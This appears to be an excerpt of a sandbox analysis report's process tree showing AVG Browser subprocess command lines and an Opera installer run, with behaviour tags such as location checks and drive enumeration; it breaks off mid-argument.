C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=7664,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6252 /prefetch:12⤵PID:2196
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3248,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:82⤵PID:4440
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7620,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7212 /prefetch:82⤵PID:6292
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3076,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7600 /prefetch:82⤵PID:7996
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3212,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6128 /prefetch:82⤵PID:8688
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6128,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6224 /prefetch:82⤵PID:8588
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6196,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6448 /prefetch:82⤵PID:8528
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=6220,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6156 /prefetch:12⤵
- Checks computer location settings
PID:5868
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=7320,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7184 /prefetch:12⤵PID:5160
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=7136,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3120 /prefetch:12⤵
- Checks computer location settings
PID:12160
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=7772,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7804 /prefetch:12⤵PID:11192
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=6184,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=2996 /prefetch:12⤵PID:1840
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=5900,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3168 /prefetch:12⤵
- Checks computer location settings
PID:11016
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=5880,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:12⤵PID:2884
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=4516,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=1112 /prefetch:12⤵PID:8804
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=6948,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4948 /prefetch:12⤵PID:2352
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=3236,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3044 /prefetch:12⤵PID:4256
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=6588,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6464 /prefetch:12⤵PID:12432
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=7892,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7384 /prefetch:12⤵PID:2504
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=4360,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:12⤵
- Checks computer location settings
PID:11872
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=5764,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:10220
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7156,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:82⤵PID:8836
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=5144,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8188 /prefetch:12⤵PID:6644
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=5268,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:12⤵
- Checks computer location settings
PID:11344
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --field-trial-handle=5524,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:12⤵PID:4960
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=7872,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5604 /prefetch:12⤵PID:12724
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --field-trial-handle=8264,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8280 /prefetch:12⤵PID:5376
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=8436,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8252 /prefetch:12⤵PID:13288
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=8548,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8572 /prefetch:12⤵PID:7012
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=5288,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4508 /prefetch:12⤵PID:4104
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --field-trial-handle=5528,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:12⤵
- Checks computer location settings
PID:10356
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --field-trial-handle=6760,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8588 /prefetch:12⤵
- Checks computer location settings
PID:10832
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --field-trial-handle=9268,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=9408 /prefetch:12⤵PID:6128
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=9396,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8748 /prefetch:12⤵PID:11064
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=9220,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6752 /prefetch:12⤵PID:1996
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --field-trial-handle=5680,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8856 /prefetch:12⤵PID:4436
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=9504,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=9484 /prefetch:82⤵PID:12156
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=9488,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=9524 /prefetch:82⤵PID:13108
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --field-trial-handle=9628,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8796 /prefetch:12⤵PID:12968
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --field-trial-handle=9824,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=9840 /prefetch:12⤵PID:6848
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --field-trial-handle=9496,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=9120 /prefetch:12⤵PID:5632
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --field-trial-handle=9512,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10064 /prefetch:12⤵PID:5140
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --field-trial-handle=10172,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10192 /prefetch:12⤵PID:12612
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --field-trial-handle=9700,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=9752 /prefetch:12⤵PID:5820
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --field-trial-handle=10380,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10372 /prefetch:12⤵
- Checks computer location settings
PID:7868
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --field-trial-handle=10364,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10512 /prefetch:12⤵PID:9528
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --field-trial-handle=8984,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10600 /prefetch:12⤵PID:7968
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --field-trial-handle=10724,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10744 /prefetch:12⤵PID:7812
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --field-trial-handle=10868,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=10888 /prefetch:12⤵PID:10456
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --field-trial-handle=11012,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11032 /prefetch:12⤵PID:5936
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --field-trial-handle=11156,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11176 /prefetch:12⤵PID:8460
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --field-trial-handle=11304,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11324 /prefetch:12⤵PID:1660
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --field-trial-handle=11520,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=9620 /prefetch:12⤵PID:12924
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --field-trial-handle=10496,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7888 /prefetch:12⤵PID:11692
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --field-trial-handle=8760,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8756 /prefetch:12⤵PID:3080
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --field-trial-handle=9120,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7864 /prefetch:12⤵PID:9208
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --field-trial-handle=11676,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11692 /prefetch:12⤵PID:4944
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=9776,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11856 /prefetch:82⤵PID:4952
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --field-trial-handle=9424,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=11924 /prefetch:12⤵PID:5736
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --field-trial-handle=11872,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=12060 /prefetch:12⤵PID:2932
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --field-trial-handle=12172,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=12196 /prefetch:12⤵PID:6456
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --field-trial-handle=12324,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=12344 /prefetch:12⤵PID:8088
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --field-trial-handle=12352,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=12488 /prefetch:12⤵PID:12176
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --field-trial-handle=12520,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=12620 /prefetch:12⤵PID:1856
-
-
C:\Users\Admin\Downloads\OperaSetup.exe"C:\Users\Admin\Downloads\OperaSetup.exe"2⤵
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
PID:3440 -
C:\Users\Admin\Downloads\OperaSetup.exeC:\Users\Admin\Downloads\OperaSetup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.35 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x67f5f308,0x67f5f314,0x67f5f3203⤵PID:3020
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\OperaSetup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\OperaSetup.exe" --version3⤵PID:2024
-
-
C:\Users\Admin\Downloads\OperaSetup.exe"C:\Users\Admin\Downloads\OperaSetup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3440 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240522201319" --session-guid=ef5862e2-9837-45c1-9203-04b6f66451d9 --server-tracking-blob=NjU3ZDM2OWIyYTNhZjkxMGQ3MDJjMWM5YzkzN2NmOWQzZjc3ZTBlZGQ4MzY1ODg5MjdkNWE0OGUzYzUyOThlMTp7ImNvdW50cnkiOiJHQiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYVNldHVwLmV4ZSIsInByb2R1Y3QiOnsibmFtZSI6Im9wZXJhIn0sInF1ZXJ5IjoiL29wZXJhL3N0YWJsZS93aW5kb3dzP3V0bV9zb3VyY2U9c29mdG9uaWMmdXRtX21lZGl1bT1wYiZ1dG1fY2FtcGFpZ249RGlzcF9kaXNfY3B1Jmh0dHBfcmVmZXJyZXI9aHR0cHMlM0ElMkYlMkZ3d3cub3BlcmEuY29tJTJGcGFydG5lciUzRnV0bV9tZWRpdW0lM0RwYiUyNnV0bV9zb3VyY2UlM0Rzb2Z0b25pYyUyNnV0bV9jYW1wYWlnbiUzRERpc3BfZGlzX2NwdSZ1dG1fc2l0ZT1vcGVyYV9jb20mdXRtX2xhc3RwYWdlPW9wZXJhLmNvbSUyRnBhcnRuZXImZGxfdG9rZW49NTU4NTM0MTUiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTY0MDg3NzYuMTE0NSIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMjQuMC4wLjAgU2FmYXJpLzUzNy4zNiBBVkcvMT